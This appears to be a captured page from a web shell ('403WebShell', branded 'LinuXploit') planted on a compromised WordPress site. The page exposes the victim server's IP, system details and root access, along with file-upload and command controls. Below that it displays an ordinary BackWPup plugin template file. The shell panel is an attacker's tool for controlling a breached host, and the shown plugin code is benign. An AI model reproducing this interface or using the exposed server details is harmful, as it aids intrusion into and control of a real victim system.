Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

Base Dir : /var/www/sweetheart.mx/htdocs

User : root


Who Knows WP Shell uploader
Uname:Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 216.238.66.20  /  Your IP : 216.73.216.51
Web Server : nginx/1.30.4
System : Linux woropds 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
User : root ( 0)
PHP Version : 8.2.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/sweetheart.mx/htdocs/wp-content/plugins/backwpup/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/sweetheart.mx/htdocs/wp-content/plugins/backwpup/pages/first-progress.php
<?php

use BackWPup\Utils\BackWPupHelpers;
use WPMedia\BackWPup\Plugin\Plugin;

if ( ! defined( 'ABSPATH' ) ) {
    exit;
}

	$abortUrl = $abortUrl ?? '';

	BackWPupHelpers::component(
		'form/hidden',
		[
			'name'       => 'backwpupworking_ajax_nonce',
			'identifier' => 'backwpupworking_ajax_nonce',
			'value'      => wp_create_nonce( 'backwpupworking_ajax_nonce' ),
		]
		);
	BackWPupHelpers::component(
		'form/hidden',
		[
			'name'       => 'backwpup_first_backup_job_id',
			'identifier' => 'backwpup_first_backup_job_id',
			'value'      => get_site_option( Plugin::FIRST_JOB_ID ),
		]
		);
	?>
<div class="max-w-screen-xl flex flex-col gap-4 backwpup-typography">

	<?php BackWPupHelpers::component( 'app/header', [] ); ?>

	<div class="p-8 bg-grey-100 rounded-lg">
	<div class="m-auto w-full max-w-[850px]">

		<?php
		BackWPupHelpers::component(
			'heading',
			[
				'level' => 1,
				'title' => __( 'We are creating a backup of your site…', 'backwpup' ),
				'align' => 'center',
			]
			);
		?>

		<?php
		BackWPupHelpers::component(
			'containers/grey-box',
			[
				'identifier'   => 'runningjob',
				'padding_size' => 'large',
				'children'     => 'backups/progress',
				'display'      => false,
			]
			);
		?>

		<div class="progressbar" style="display: none;">
			<div id="progresssteps" class="bwpu-progress" style="width:0%;">0%</div>
		</div>
		<div class="mt-6 p-8 text-center bg-white rounded-lg">
		<div id="info_container_2">
			<div class="inline-block p-1 bg-alert-light text-alert rounded">
			<?php
			BackWPupHelpers::component(
				'icon',
				[
					'name'     => 'alert',
					'size'     => 'medium',
					'abortUrl' => $abortUrl,
				]
				);
			?>
			</div>
			<h2 class="mt-4 mb-2 text-primary-darker text-xl font-semibold"><?php esc_html_e( 'Creating a backup might take a few minutes, depending on your site’s size', 'backwpup' ); ?></h2>
			<p class="text-xl font-light"><?php esc_html_e( 'The backup will keep running. You’ll get a notification when it’s done.', 'backwpup' ); ?></p>
			<p class="mt-2 text-base font-semibold text-alert"><?php esc_html_e( 'Feel free to leave 👋', 'backwpup' ); ?></p>
		</div>

		<?php
		BackWPupHelpers::component(
			'first-congrats',
			[
				'identifier' => 'first-congratulations',
				'display'    => false,
			]
			);
		?>
		</div>
	</div>
	</div>

	<?php
	if ( ! BackWPup::is_pro() ) :

		BackWPupHelpers::component(
		'containers/green-box',
		[
			'children' => 'backup/upgrade',
		]
		);

	endif;
	?>
</div>

<?php
BackWPupHelpers::component( 'containers/sidebar' );
BackWPupHelpers::component( 'containers/modal' );
?>

Youez - 2016 - github.com/yon3zu
LinuXploit